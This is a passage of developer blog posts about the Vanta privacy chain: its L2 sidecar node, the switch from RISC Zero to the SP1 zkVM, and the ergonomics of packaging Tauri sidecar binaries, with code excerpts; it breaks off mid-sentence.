The footprint cost lives in the operator's discretion: if you don't want the L2 services, don't run `vanta-node`. We went with B and I don't regret it. The trade-off is that the L2 sidecar is a piece of operational machinery to keep alive. The desktop app handles that automatically (see [vanta-desktop](/blog/vanta_desktop_tauri_wallet/)); a server operator handles it the way they handle any daemon. ## What `vanta-node` actually does [`main.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-node/src/main.rs) is a four-task tokio program: ```rust let watcher_handle = tokio::spawn(async move { if let Err(e) = l1_watcher::run(watcher_config, watcher_state).await { tracing::error!("L1 watcher error: {e}"); } }); let gossip_handle_opt = match gossip::start(state.clone(), config.bootstrap_peers.clone()).await { Ok((handle, router)) => { ... } Err(e) => { tracing::warn!("Failed to start gossip (continuing without P2P): {e}"); None } }; let api_handle = tokio::spawn(async move { if let Err(e) = api::serve(api_state, &api_listen).await { tracing::error!("API server error: {e}"); } }); let save_handle = tokio::spawn(async move { let mut interval = tokio::time::interval(tokio::time::Duration::from_secs(10)); loop { interval.tick().await; if let Err(e) = save_state.save() { tracing::warn!("Failed to save state: {e}"); } } }); ``` Four jobs: watch L1 for new blocks, gossip with peers over iroh, serve the REST API, and snapshot state to disk every 10 seconds. Each tokio task runs against a shared `L2State` that's `Arc`-cloned across them. The **L1 watcher** polls `vantad`'s RPC every 2 seconds (configurable via `VANTA_POLL_MS`). 
For each new block it scans every transaction's outputs for the `OP_RETURN` anchor format we use to publish commitments and nullifiers — the byte sequence is `OP_RETURN 0xbb 0x00 <32-byte commitment>`, defined in the [pool's stratum server](https://github.com/Dax911/vanta/blob/main/pool/stratum_server.py) where I wrote it in Python and reused the format on the Rust side. Hits get fed into the SMT. The **gossip layer** uses [iroh](https://iroh.computer) — pure-Rust, QUIC-based, NAT-traversing — to share encrypted notes between L2 peers. The `bootstrap_peers` come from an env var; the desktop app starts with that empty by default. Iroh's gossip is a per-topic channel and we use one topic per chain (mainnet, regtest). The architecture doc explains the pick: > **P2P:** iroh.computer — pure Rust, QUIC-based, NAT traversal, gossip protocol, content-addressed blobs. Chosen over libp2p for simplicity, built-in QUIC + NAT hole-punching, and document sync (useful for offline branch-and-merge). The **REST API** is the thing wallets actually consume. The endpoints I care most about are `/status` (commitment count, nullifier count, SMT root, last block), `/submit` (push new commitments + encrypted notes from the pool or a wallet), `/notes/scan` (trial-decrypt encrypted notes against a wallet's secret key), and `/proofs/recent` (the 500-slot ring buffer of recently-verified proofs the explorer renders). The **save loop** is 10-second snapshots. The state file is a bincode'd dump of the SMT plus the nullifier set plus the encrypted-note inbox. `Drop` on the `L2State` saves on shutdown too. If the process is killed `-9` you lose at most 10 seconds of work, and the L1 watcher rebuilds the state by re-scanning from the last good height. ## How the wallet uses the sidecar The desktop wallet uses both `vantad` *and* `vanta-node`. From the wallet's perspective: - `vantad` is the source of truth for L1 — block heights, transparent UTXOs, transaction broadcast. 
- `vanta-node` is the source of truth for L2 — commitments, nullifiers, encrypted notes addressed to me.

When I press "send" on a private transaction in the desktop wallet:

1. The wallet asks `vanta-node` for the current SMT root and the membership proof for the input commitment I'm spending.
2. The wallet generates an SP1 proof locally (or, for low-end machines, against the SP1 proving network) using the membership proof and my secret key as private witness.
3. The wallet builds an L1 transaction that includes the SP1 proof in `witness.stack[0]` and an OP_RETURN anchor with the new commitment.
4. The wallet broadcasts the transaction via `vantad`'s `sendrawtransaction` RPC.
5. `vantad` validates: standard script checks, then `vanta_verify_and_decode()` against the SP1 proof in the witness.
6. After the block is mined, `vanta-node`'s L1 watcher picks up the OP_RETURN anchor and the new commitment lands in the SMT.

The recipient's wallet then pulls candidate ciphertexts from its `vanta-node` via `/notes/scan` and trial-decrypts them locally with its secret key. If a note decrypts cleanly, it's mine.

This is the architecture the [coinbase auto-shield](#) feature also rides on: every miner reward is a witness v2 commitment paying into the miner's shielded address, with the encrypted note pushed to the L2 via the same `/submit` endpoint. From the [pool's stratum server](https://github.com/Dax911/vanta/blob/main/pool/stratum_server.py):

```python
def save_shielded_note(height, commitment_hex, randomness_hex, value):
    """Persist mining note and submit encrypted note to L2 for wallet discovery.

    Called ONLY after a winning block is accepted by submitblock — never from
    the per-share job-template path, otherwise the L2 SMT fills up with phantom
    commitments for templates that never won the PoW race.
    """
```

That comment is load-bearing. The first version of the pool submitted the encrypted note on every share — that produced thousands of phantom commitments per block.
Submitting only on `submitblock` accept fixes it. ## Failure modes The sidecar architecture has failure modes the in-process design wouldn't have. They're worth naming. **`vanta-node` is dead, `vantad` is alive.** The wallet's L1 RPC works fine. The wallet's L2 calls all 503. The desktop app surfaces this as "L2 disconnected" and lets you keep using transparent functionality. Private send is gated behind L2 reachability. **`vantad` is dead, `vanta-node` is alive.** L1 RPC fails. `vanta-node`'s watcher logs polling failures. The L2 state is frozen at whatever block was last seen. The desktop app surfaces this as "L1 disconnected"; sending is impossible (no broadcast endpoint), but the wallet can still display historic state. **Both alive but `vanta-node` lost its data dir.** The L1 watcher detects "I've seen no blocks" on startup and re-scans from genesis. On a small chain this is fine. On a large chain this is a known cost of recovery — measured in hours, not days, but not free. **`vanta-node` is alive but the SMT is corrupted.** This one I worry about. Bincode + Drop-save + 10-second snapshots is a defensible steady state, but a partial write during a crash could in principle produce a non-loading state file. Recovery is "rm the state file, restart, let the watcher rebuild." We have monitoring on the fall-through path. **TODO: Dax confirm we ship cryptographic checksums on the state file.** ## What this isn't I want to head off two possible misreadings. **This is not a proof-on-server architecture.** The proof generation happens in the wallet (or, optionally, on a remote SP1 prover the user trusts). `vanta-node` doesn't generate proofs. It distributes encrypted notes and indexes commitments. The only ZK code in `vanta-node` is the verifier path it uses to sanity-check proofs before accepting them into the proof event ring buffer. **This is not a custodial sidecar.** `vanta-node` never sees secret keys. 
The encrypted notes are encrypted *to the recipient's pubkey* — `vanta-node` distributes ciphertext. Trial decryption happens client-side in the wallet using the recipient's secret. Lose the secret, lose the funds; lose the L2 sidecar, replay the chain. The cryptographic posture is the same as Zcash Sapling notes.

## What I changed my mind about

The original [nullifier-set post](/blog/vanta_l1_nullifier_set/) hinted at this: "The actual ZK proof verification happens **out of process** in the Rust sidecar. The C++ node fires off the proof to a local Unix socket and waits for `ok` or `not ok`." That's how it was originally architected. We changed it.

The Unix-socket sidecar didn't survive contact with the SP1 backend. Spawning a sub-process every block to verify proofs is fine in regtest where blocks are minutes apart; on mainnet at 1-minute blocks with peak-hour transaction volume, the IPC overhead added up to milliseconds per verify, multiplied by every spend in every block. Statically linking `libvanta_verifier.a` into `vantad` brought the verifier into the same address space and the same allocator and dropped the per-verify cost to roughly what an in-Rust call would cost. The audit-surface concern is real but mitigated by the *minimal* FFI: 440 bytes of struct, two C functions, deterministic output. A fuzzer can hammer that boundary and you'll know if it's broken.

What's *still* out of process is the L2 state — the SMT, the nullifier index, the encrypted-note inbox. That's the thing whose footprint we never want inside `vantad`, and there it's stayed.
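That 440-byte boundary is easy to pin down mechanically. A minimal sketch of a layout assertion — assuming `VANTA_MAX_SLOTS` is 4, which is the slot count consistent with the quoted 440-byte size (the real `verifier.h` value may differ):

```rust
// Illustrative mirror of the VantaJournal ABI struct from verifier.h.
// VANTA_MAX_SLOTS = 4 is an assumption: it is the slot count consistent
// with the 440-byte total quoted in the engineering paper.
const VANTA_MAX_SLOTS: usize = 4;

#[repr(C)]
struct VantaJournal {
    smt_root: [u8; 32],
    input_commitment_count: u32,
    input_commitments: [[u8; 32]; VANTA_MAX_SLOTS],
    nullifier_count: u32,
    nullifiers: [[u8; 32]; VANTA_MAX_SLOTS],
    commitment_count: u32,
    commitments: [[u8; 32]; VANTA_MAX_SLOTS],
    value_balance: i64,
}

fn main() {
    // repr(C) layout: the fields sum to 436 bytes, but value_balance lands
    // at offset 428 and i64 needs 8-byte alignment, so the compiler pads
    // it to offset 432 — giving the 440-byte total the C side expects.
    assert_eq!(std::mem::size_of::<VantaJournal>(), 440);
    assert_eq!(std::mem::align_of::<VantaJournal>(), 8);
    println!("VantaJournal is {} bytes", std::mem::size_of::<VantaJournal>());
}
```

An assertion like this in the FFI crate's tests turns journal-layout drift between the Rust and C sides into a CI failure rather than a corrupted consensus read.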
## Further reading - [`vanta/vanta-node`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-node) — the L2 sidecar - [`vanta/vanta-verifier-ffi`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-verifier-ffi) — the in-process FFI verifier - [`papers/17-zkvm-engineering.md`](https://github.com/Dax911/vanta/blob/main/papers/17-zkvm-engineering.md) — the design rationale for the SP1/Plonky3 backend - [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — the chain itself - [Vanta Desktop: a Tauri wallet that ships its own full node](/blog/vanta_desktop_tauri_wallet/) — the binary that supervises both processes - [iroh.computer](https://iroh.computer) — the QUIC-based P2P stack the gossip layer uses --- # Why we shipped SP1 instead of RISC Zero Canonical: https://blog.skill-issue.dev/blog/vanta_sp1_zkvm_circuits/ Description: Vanta's earliest design notes said 'RISC Zero zkVM.' Production ships SP1 + Plonky3. The swap was cheap because the privacy protocol is independent of the prover. Here is why we moved, what stayed the same, and what the FFI verifier looks like. Published: 2026-04-15T23:15:13.000Z Tags: vanta, sp1, risc-zero, zkvm, plonky3, rust In the original [Vanta L1 post](/blog/vanta_zk_privacy_l1/) I wrote: > The ZK layer is in the `vanta/` subtree, written in Rust against [RISC Zero's zkVM](https://www.risczero.com), running entirely outside the C++ core. That sentence was true when I wrote it. It is no longer true. Production Vanta ships SP1 — Succinct Labs' zkVM — with Plonky3 as the proof backend. RISC Zero was the early prototype. The migration happened before mainnet and has been the production prover for every consensus-critical proof since. This post is the *why* of that change, the architectural choice that made the migration cheap, and what the verifier surface inside `vantad` actually looks like. 
The design rationale is also documented in [`papers/17-zkvm-engineering.md`](https://github.com/Dax911/vanta/blob/main/papers/17-zkvm-engineering.md), which is the canonical version. This post is the practitioner-flavored version: what I had to change, what I didn't, and what I'd warn the next person about. ## The abstraction that made the swap cheap The reason RISC Zero → SP1 was a code refactor and not an architectural rewrite is that the ZK code in Vanta is split into four layers and only *two* of them touch the zkVM SDK at all. From the engineering paper: > 1. **Core logic** (`vanta-core`): Pure Rust library containing the transfer validation function, domain-separated commitment construction, nullifier derivation, SMT membership proofs, and conservation law checks. This library has no dependency on any zkVM. It compiles to native x86, to ARM, and to RISC-V. It is the same code whether it runs inside a zkVM guest, inside a test harness, or on a developer's laptop. > > 2. **Guest program** (`vanta-circuits/methods/guest/`): A thin wrapper that reads private inputs from the zkVM host, calls `validate_transfer()` from `vanta-core`, and commits the public outputs (`TransferPublicInputs`: `smt_root`, `input_commitments`, `nullifiers`, `commitments`, `value_balance`) to the journal. The guest program is a few dozen lines of Rust. Its only zkVM-specific code is the I/O calls (`sp1_zkvm::io::read()` and `sp1_zkvm::io::commit()`). > > 3. **Host prover** (`vanta-circuits/src/prover.rs`): The component that sets up the proving environment, feeds private inputs to the guest, and invokes SP1 to generate a compressed Plonky3 proof. > > 4. **FFI verifier** (`vanta-verifier-ffi`): A Rust static library compiled to `libvanta_verifier.a` and linked directly into `vantad`. The split means that *the cryptographic protocol* — commitment scheme, nullifier scheme, conservation law, SMT membership proof verification — lives in `vanta-core` and has no zkVM dependency. 
The same Rust source compiles to: - native x86_64 for unit tests on my laptop - RISC-V for either zkVM's guest target - ARM for the iOS wallet (eventually) The guest program in [`vanta-circuits/methods/guest/`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-circuits/methods/guest) is a thin shim. Its only zkVM-specific code is `sp1_zkvm::io::read()` to pull private inputs and `sp1_zkvm::io::commit()` to commit public outputs to the proof journal. Swapping to a different zkVM is a few lines of code in a file that is a few dozen lines long. It is not an architectural change. That split is why I'm comfortable saying we could swap zkVMs *again* without an architectural rewrite. The chain doesn't know what proof system it's running; it knows how to verify a journal. ## What the host prover looks like Here's the actual prover from [`vanta-circuits/src/prover.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-circuits/src/prover.rs): ```rust pub fn prove_transfer( private_inputs: &TransferPrivateInputs, smt_root: &Hash, ) -> Result<(SP1ProofWithPublicValues, TransferPublicInputs)> { let pi = private_inputs.clone(); let root = *smt_root; let result = std::thread::spawn(move || -> Result<...> { let mut stdin = SP1Stdin::new(); stdin.write(&pi); stdin.write(&root); let client = ProverClient::from_env(); let pk = client.setup(GUEST_ELF.clone())?; // Use compressed proofs (no Docker dependency). // Groth16 wrapping requires Docker + Gnark — enable later for production. let proof = client.prove(&pk, stdin).compressed().run()?; let mut proof_clone = proof.clone(); let public_inputs: TransferPublicInputs = proof_clone.public_values.read(); Ok((proof, public_inputs)) }) .join() .map_err(|e| anyhow::anyhow!("proof thread panicked: {:?}", e))??; Ok(result) } ``` A couple of details worth pulling out. **Compressed proofs, not Groth16-wrapped.** SP1 supports a Groth16 wrapping step that shrinks the receipt from ~1.27 MB to ~260 bytes. 
v2.0 ships compressed Plonky3 instead because Groth16 wrapping requires a Docker + Gnark toolchain that I did not want in the consensus-critical path at launch. Smaller proofs are a future release. **Spawn-on-thread because of tokio.** SP1's blocking ProverClient creates its own tokio runtime. If you call it from inside another tokio runtime — which is what happens when the Axum wallet or the Tauri app invokes the prover — you get a "runtime in runtime" panic. Spawning the prove call on a dedicated `std::thread` and joining it cleanly side-steps that. This is the kind of footgun that's invisible at unit-test time and very visible at integration-test time. It cost me an afternoon. Documented now. **`include_elf!` macro.** The guest binary is embedded into the host binary at compile time: ```rust pub static GUEST_ELF: Elf = include_elf!("vanta-guest"); ``` That means the wallet binary (or the Tauri host) carries the guest ELF along with the proving stack. No separate file to ship, no path resolution. This was one of the SP1 ergonomic wins over RISC Zero — the include macro removes a class of "where's the guest" bugs. ## What stayed identical The cryptographic protocol *did not change* between RISC Zero and SP1. From the engineering paper: > ### 4.1 The Privacy Model Is Application-Layer, Not Prover-Layer > > Vanta's privacy guarantees come from four cryptographic constructions, all of which are implemented in `vanta-core` and are independent of the proof system: > > **Commitment hiding.** A note commitment is computed as: > $$\text{cm} = H(\text{"Vanta/NoteCommitment/v1"}, \text{value} \| \text{owner\_pk} \| \text{asset\_type} \| r)$$ > > The hiding property — the fact that an observer cannot determine the committed values from the commitment — comes from the randomness $r$ and the preimage resistance of the hash function. This has nothing to do with the proof system. 
Whether the commitment is computed inside SP1, inside another zkVM, or on a napkin, the hiding property is identical. This is the load-bearing insight. The proof system is an *attestation layer*. It says "I correctly executed this Rust program against these private inputs and the public outputs are these." It does not contribute to the soundness of the commitment scheme, the unlinkability of the nullifier, or the integrity of the SMT membership proof. Those properties live in the application code that runs *inside* the proof. ## Why SP1 won The full case is in the engineering paper. The short version: **Speed.** SP1 generates compressed Plonky3 receipts for Vanta's transfer workload in 30–60 seconds on a modern multi-core CPU. RISC Zero in our early benchmarks was slower — comparable on simple programs, materially slower once domain-separated SHA-256 was the dominant operation. SP1's SHA-256 precompile is the difference; it substitutes a hand-optimized circuit for the operation rather than proving SHA-256 instruction-by-instruction through the RISC-V execution trace. **Trusted-setup posture.** Plonky3 is a hash-based STARK. It is post-quantum-resilient (under Grover's algorithm, 256-bit hash → 128-bit effective security is still strong) and it has *no trusted setup, no SRS, no powers-of-tau ceremony*. Anyone can compile the prover and verifier from source and run them without trusting a third party to have generated setup parameters correctly. This was a hard requirement for Vanta. The engineering paper is opinionated about it: > a permanent contingent backdoor against a single participant's operational discipline is not a substitute for transparent cryptography. That sentence is the reason we don't ship Groth16, despite Groth16's ~260-byte proofs. Groth16's per-circuit trusted setup requires a multi-party-computation ceremony where the security assumption is "at least one participant was honest and destroyed their share." We didn't want to carry that assumption. 
**SDK ergonomics.** SP1's `include_elf!`, `SP1Stdin`, `ProverClient` API, and the cargo-prove tool are well-typed and well-documented. The development cycle is fast and doesn't require specialized tooling beyond the Rust toolchain plus the SP1 target. **Active development + funding.** Succinct (the company) has raised over $55M and ships monthly releases with measurable performance improvements. SP1 is MIT/Apache-2.0, used in production by multiple chains. Lower abandonment risk than smaller projects. **GPU acceleration available.** SP1 has CUDA-based GPU proving. Doesn't matter for the wallet path (we're not putting GPUs in user laptops) but matters for the proving-network and miner-prover roles. ## What the FFI verifier looks like The FFI lives in [`vanta/vanta-verifier-ffi/`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-verifier-ffi) and compiles to `libvanta_verifier.a`. It exposes two functions to C++: ``` bool vanta_verify_and_decode(const uint8_t *proof_bytes, size_t proof_len, VantaJournal *out); bool vanta_decode_journal(const uint8_t *bytes, size_t len, VantaJournal *out); ``` The C++ consensus engine in `src/script/interpreter.cpp` calls `vanta_verify_and_decode` from the witness-v2 branch. It hands over a byte slice (the SP1 receipt embedded in `witness.stack[0]`) and receives back a boolean and a populated `VantaJournal`. The `VantaJournal` is the 440-byte struct from the engineering paper: ```c typedef struct { uint8_t smt_root[32]; uint32_t input_commitment_count; uint8_t input_commitments[VANTA_MAX_SLOTS][32]; uint32_t nullifier_count; uint8_t nullifiers[VANTA_MAX_SLOTS][32]; uint32_t commitment_count; uint8_t commitments[VANTA_MAX_SLOTS][32]; int64_t value_balance; } VantaJournal; ``` The C++ doesn't deserialize the proof. It doesn't know the proof system. 
It looks at 32-byte hashes and a signed `int64_t`, and:

- checks the `input_commitments` against the spent UTXO's `OP_2 PUSH32 <commitment>` script
- checks the `nullifiers` against the chainstate nullifier set ([the post on this](/blog/vanta_l1_nullifier_set/))
- checks the `smt_root` against the chain's currently committed state root
- checks `value_balance` for sign + balance against any transparent outputs in the transaction

That's the whole consensus contract. The proof verified bit either is or isn't set. Everything else is byte arithmetic. The minimal-FFI design is what makes the audit story tractable. A fuzzer can hammer the boundary and you'll know if `vanta_verify_and_decode` ever populates a journal that the proof didn't actually attest to. The Rust side is the thing that needs the careful audit; the C++ side is reading bytes.

## What I learned about zkVMs by switching

A few things I'd tell my past self.

**Decouple the cryptographic protocol from the proof system. Hard.** It is enormously tempting to put commitment construction in the guest program. Don't. Put it in `vanta-core`, call it from the guest, *and call it from native unit tests*. The native unit tests are how you find off-by-one byte ordering bugs without paying 30s/proof to find them.

**The journal is the public contract.** Whatever public outputs you commit to the proof journal *are* your interface. Adding a field is a forking change for the verifier. Removing one is too. Plan the journal layout the way you'd plan a serialised network message: explicit, versioned, ABI-stable.

**Compressed proofs are large.** ~1.27 MB on Vanta. That meant raising `MAX_STANDARD_TX_WEIGHT` to `MAX_BLOCK_WEIGHT` so a single witness-v2 spend fits in one transaction. Plan the chain parameters around the proof size you ship with, and budget for the eventual Groth16-wrapping shrink.

**zkVM benchmarks lie about your workload.** Generic prover benchmarks measure simple programs. Yours is not simple.
Measure your *actual circuit* against the candidates before deciding. SP1's SHA-256 precompile dominated our workload; if your hashing is Poseidon over a different field, your numbers will look different. ## What's next The roadmap from the papers calls out a few things that have *not* shipped yet: - **Groth16 wrapping** to bring receipt size from 1.27 MB to ~260 bytes. Deferred for the Docker dependency reason above. - **Poseidon migration** to replace SHA-256 in the commitment scheme with a ZK-friendlier hash. Performance win, no security change. - **GPU proving distribution.** SP1 supports CUDA but we haven't shipped a wallet path that uses it; the lift is mostly UX (how does the user point at a GPU?) and packaging. The architectural property I want to keep regardless of which of these lands: *the chain doesn't know what proof system it's running, it knows how to verify a journal*. That's the property that lets us swap zkVMs again. It's the property that lets the eventual full-Rust node rewrite ship without a forking change. It's the property that, six years from now, lets us swap the proof backend for whatever has won the 2032 cryptography landscape. 
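The "decouple, hard" advice has a concrete shape: commitment construction as a pure function in a prover-agnostic crate, exercised by native tests. A minimal sketch of that shape — with an inline FNV-1a standing in for the real domain-separated SHA-256, and `commit_note` as an illustrative name, not `vanta-core`'s actual API:

```rust
// Illustrative only: FNV-1a stands in for the real hash here. The actual
// vanta-core commitment uses domain-separated SHA-256 and its own names.
fn fnv1a(bytes: &[u8]) -> u64 {
    let mut h: u64 = 0xcbf29ce484222325;
    for &b in bytes {
        h ^= b as u64;
        h = h.wrapping_mul(0x100000001b3);
    }
    h
}

// The pattern from the post: commitment construction is a pure function
// with no zkVM dependency, so the same body runs inside a guest program
// and inside an ordinary native test.
fn commit_note(value: u64, owner_pk: &[u8; 32], asset_type: u32, r: &[u8; 32]) -> u64 {
    let mut preimage = Vec::new();
    preimage.extend_from_slice(b"Vanta/NoteCommitment/v1"); // domain separation
    preimage.extend_from_slice(&value.to_le_bytes());
    preimage.extend_from_slice(owner_pk);
    preimage.extend_from_slice(&asset_type.to_le_bytes());
    preimage.extend_from_slice(r);
    fnv1a(&preimage)
}

fn main() {
    let pk = [7u8; 32];
    // Different randomness must give a different commitment (hiding needs r).
    let cm1 = commit_note(100, &pk, 0, &[1u8; 32]);
    let cm2 = commit_note(100, &pk, 0, &[2u8; 32]);
    assert_ne!(cm1, cm2);
    // Deterministic: same inputs, same commitment — checked natively,
    // without paying 30s per proof to find a byte-ordering bug.
    assert_eq!(cm1, commit_note(100, &pk, 0, &[1u8; 32]));
}
```

In the real split, the guest would call the same function behind `sp1_zkvm::io` reads; the native test is where byte-ordering mistakes die cheaply.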
## Further reading - [`vanta/vanta-circuits`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-circuits) — host prover + guest program - [`vanta/vanta-verifier-ffi`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-verifier-ffi) — the static library linked into vantad - [`papers/17-zkvm-engineering.md`](https://github.com/Dax911/vanta/blob/main/papers/17-zkvm-engineering.md) — full design rationale - [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — the chain the verifier protects - [L1 nullifier sets: enforcing no-double-spend at consensus](/blog/vanta_l1_nullifier_set/) — what the verifier's nullifiers feed into - [SP1 docs](https://docs.succinct.xyz/docs/sp1/introduction) — the prover we ship - [Plonky3 repo](https://github.com/Plonky3/Plonky3) — the proof backend --- # Tauri 2.x sidecars in anger: the ergonomics paper-cuts I had to fix Canonical: https://blog.skill-issue.dev/blog/vanta_tauri_ergonomics/ Description: externalBin wants a target-triple suffix nobody documents loudly enough. The dev resolver walks up parents. Startup must be sequenced. The setup-sidecars.sh + resolve_binary() story for shipping a wallet that runs its own node. Published: 2026-04-13T21:45:02.000Z Tags: vanta, tauri, rust, desktop, sidecar, devenv The [Vanta Desktop walkthrough](/blog/vanta_desktop_tauri_wallet/) is the architectural story: a Tauri 2.x wallet that ships its own full node, supervises three sidecar binaries, and exposes everything through `#[tauri::command]` IPC. That post is the *what.* This post is the *how* — the small, awkward, under-documented ergonomics details that took me a working week to figure out. If you're shipping a Tauri app with sidecar binaries in 2026 and you're hitting walls, this post is the field notes I wish someone had written for me. If you're not, skip it. ## The target-triple suffix The first wall is the one that's most easily missed because it works fine in production and breaks subtly in dev. 
Tauri's `externalBin` config in [`tauri.conf.json`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/tauri.conf.json) declares the sidecar binaries: ```json "externalBin": [ "binaries/vantad", "binaries/vanta-node", "binaries/vanta-cli" ] ``` The bundler does *not* look for `binaries/vantad` literally. It looks for `binaries/vantad-` — that is, the file with the target-triple appended. On Apple Silicon that's `binaries/vantad-aarch64-apple-darwin`. On Intel macOS it's `binaries/vantad-x86_64-apple-darwin`. On Linux it's `binaries/vantad-x86_64-unknown-linux-gnu`. Windows is `binaries/vantad-x86_64-pc-windows-msvc`. If the file is named just `binaries/vantad`, Tauri's bundler emits a moderately cryptic error during `tauri build`. The fix is renaming the file. The discovery process for figuring this out is `tauri build` → fail → google → find a [years-old GitHub issue](https://github.com/tauri-apps/tauri/issues) → realise. The setup script that handles this lives in [`setup-sidecars.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/setup-sidecars.sh) and the load-bearing line is the very first one: ```bash TRIPLE=$(rustc -vV | grep host | awk '{print $2}') ``` `rustc -vV` outputs Rust's verbose version info, which includes a `host: ` line. Awk picks the second field. The variable then suffixes every file copied into `src-tauri/binaries/`: ```bash cp "$VANTAD" "$BINDIR/vantad-$TRIPLE" cp "$ZERANODE" "$BINDIR/vanta-node-$TRIPLE" ``` That's the canonical way to discover the host triple, and it's what every Tauri tutorial buries five paragraphs in. **Do not hardcode the triple.** A Mac developer who switches between aarch64 and x86_64 (e.g., a Rosetta context for testing) will produce one set of binaries from one shell and another from another, and the bundler will pick whichever is on disk *and* matches the active build target — only one of which is correct on any given build. 
The full search for `vantad` in `setup-sidecars.sh` walks well-known locations: ```bash VANTAD="${ZERA_L1_BIN:-}" if [ -z "$VANTAD" ]; then for candidate in \ "../src/vantad" \ "../../src/vantad" \ "/usr/local/bin/vantad" \ ; do if [ -x "$candidate" ]; then VANTAD="$candidate" break fi done fi ``` The `../src/vantad` and `../../src/vantad` are relative paths from `vanta-desktop/` and `vanta-desktop/src-tauri/` respectively. The `/usr/local/bin/vantad` is the canonical install path on macOS. The `ZERA_L1_BIN` env var is the escape hatch for non-default layouts. (The variable name still reads `ZERA_L1_BIN` because of the [zeracoin → vanta rebrand](/blog/vanta_darwin_apple_silicon_build/) — pre-rebrand artefact, on the cleanup list.) ## The dev-mode resolver The bundler problem is solved at *build* time. There's a different problem at *dev* time: when you `cargo run` the Tauri host directly (or `pnpm tauri dev`), the executable lives at `src-tauri/target/debug/vanta-desktop`, not in a `.app` bundle. The sidecars aren't sitting next to the host executable; they're at `src-tauri/binaries/vanta*-`. The host has to discover them at runtime, in both production and dev. The function that does this is `resolve_binary` in [`src-tauri/src/node.rs:225`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/node.rs): ```rust pub fn resolve_binary(name: &str, config_path: &str) -> PathBuf { let triple = target_triple(); let suffixed = format!("{name}-{triple}"); if let Ok(exe) = std::env::current_exe() { if let Some(dir) = exe.parent() { // Production: sidecars are next to the exe with triple suffix for candidate in [ dir.join(&suffixed), dir.join(name), ] { if candidate.exists() && candidate.metadata().map(|m| m.len() > 0).unwrap_or(false) { tracing::info!("Found sidecar: {}", candidate.display()); return candidate; } } // Dev mode: the exe is at src-tauri/target/debug/vanta-desktop. // Walk up ancestors looking for a `binaries/` dir containing our binary. 
            for ancestor in dir.ancestors().skip(1) {
                let candidate = ancestor.join("binaries").join(&suffixed);
                if candidate.exists() && candidate.metadata().map(|m| m.len() > 0).unwrap_or(false) {
                    tracing::info!("Found dev sidecar: {}", candidate.display());
                    return candidate;
                }
            }
        }
    }

    // Check explicit config path
    let config = PathBuf::from(config_path);
    if config.exists() && config.metadata().map(|m| m.len() > 0).unwrap_or(false) {
        return config;
    }

    // Fall back to PATH lookup
    PathBuf::from(name)
}
```

The five-tier resolution order is:

1. Same directory as the host exe, with the triple suffix → production bundle.
2. Same directory as the host exe, without suffix → also production, fallback for some bundlers.
3. Walk up the parent chain looking for a `binaries/` directory → dev mode.
4. Explicit path from `WalletConfig` → user override.
5. Bare `name` → `PATH` lookup.

The fallback to PATH is what lets a developer with `vantad` already installed at `/usr/local/bin/vantad` skip the `setup-sidecars.sh` step entirely if they want to. The metadata check for `len() > 0` is paranoia — empty files passing existence checks have caused at least one wasted afternoon.

The `target_triple()` helper picks the right suffix based on `cfg!`:

```rust
pub fn target_triple() -> &'static str {
    if cfg!(target_os = "macos") {
        if cfg!(target_arch = "aarch64") {
            "aarch64-apple-darwin"
        } else {
            "x86_64-apple-darwin"
        }
    } else if cfg!(target_os = "linux") {
        "x86_64-unknown-linux-gnu"
    } else {
        "x86_64-pc-windows-msvc"
    }
}
```

This is intentionally a hardcoded match. We don't support other target triples (yet — Linux ARM is an "if a user complains" item). One honest caveat: as written, the final `else` assumes Windows rather than erroring, so a genuinely unsupported OS would silently get a binary that can't find its sidecars; a `compile_error!` arm for unknown targets is what turns that into a loud build failure.
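The five-tier order can be expressed as a pure function that just enumerates the paths `resolve_binary` would try, in order. This is a sketch for illustration — the real function interleaves existence and file-size checks, and `candidate_paths` is a name I'm inventing here:

```rust
use std::path::{Path, PathBuf};

// Enumerate resolution candidates in priority order, given the directory
// holding the host executable. Purely computational: no filesystem access.
fn candidate_paths(exe_dir: &Path, name: &str, triple: &str, config_path: &str) -> Vec<PathBuf> {
    let suffixed = format!("{name}-{triple}");
    let mut out = vec![
        exe_dir.join(&suffixed), // 1. next to the exe, triple-suffixed (bundle)
        exe_dir.join(name),      // 2. next to the exe, bare name
    ];
    // 3. walk up the ancestors looking for binaries/<name>-<triple> (dev mode)
    for ancestor in exe_dir.ancestors().skip(1) {
        out.push(ancestor.join("binaries").join(&suffixed));
    }
    out.push(PathBuf::from(config_path)); // 4. explicit config override
    out.push(PathBuf::from(name));        // 5. bare name → PATH lookup
    out
}
```

Writing the order down as data like this also makes it trivial to unit-test the priority logic without touching a real filesystem.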
## The signing identity Tauri 2.x's macOS bundler signs every binary in the `.app` with the identity declared in `tauri.conf.json`: ```json "macOS": { "signingIdentity": "474F624D8F3783B4D607CFF2331AD4C6CC26A1B5", "providerShortName": "9HD4Q82U58", "entitlements": "entitlements.plist", "minimumSystemVersion": "10.15" } ``` `signingIdentity` is the SHA1 fingerprint of an Apple Developer ID Application certificate. You can list yours with `security find-identity -v -p codesigning`. The format `474F62...` is a hex fingerprint, not a CN string — Tauri specifically looks up by fingerprint to disambiguate when you have multiple Developer ID certs in keychain. This took me a few false starts to land on; the first version of this config used the human-readable CN ("Developer ID Application: Hayden Porter-Aylor (9HD4Q82U58)") and broke when I had two certs from different teams. `providerShortName` is the Apple Team ID, the same string that goes in the cert's CN. It's needed for notarisation — `xcrun notarytool submit` requires `--team-id` to match this value. `entitlements` points at a separate plist file. Tauri's default entitlements are too permissive for a wallet; ours pins network access (we need it for the L2 P2P), allows JIT (because the WebView needs it), and otherwise denies everything — including microphone, camera, location, and the raft of other Apple-managed entitlements that a finance app should not be requesting. ## Sequenced startup, not parallel The first version of the wallet started both nodes in parallel, hoping the L2 watcher would survive its first few RPC failures while the L1 came up. It didn't. The L2 would crash on its first poll, the supervisor would 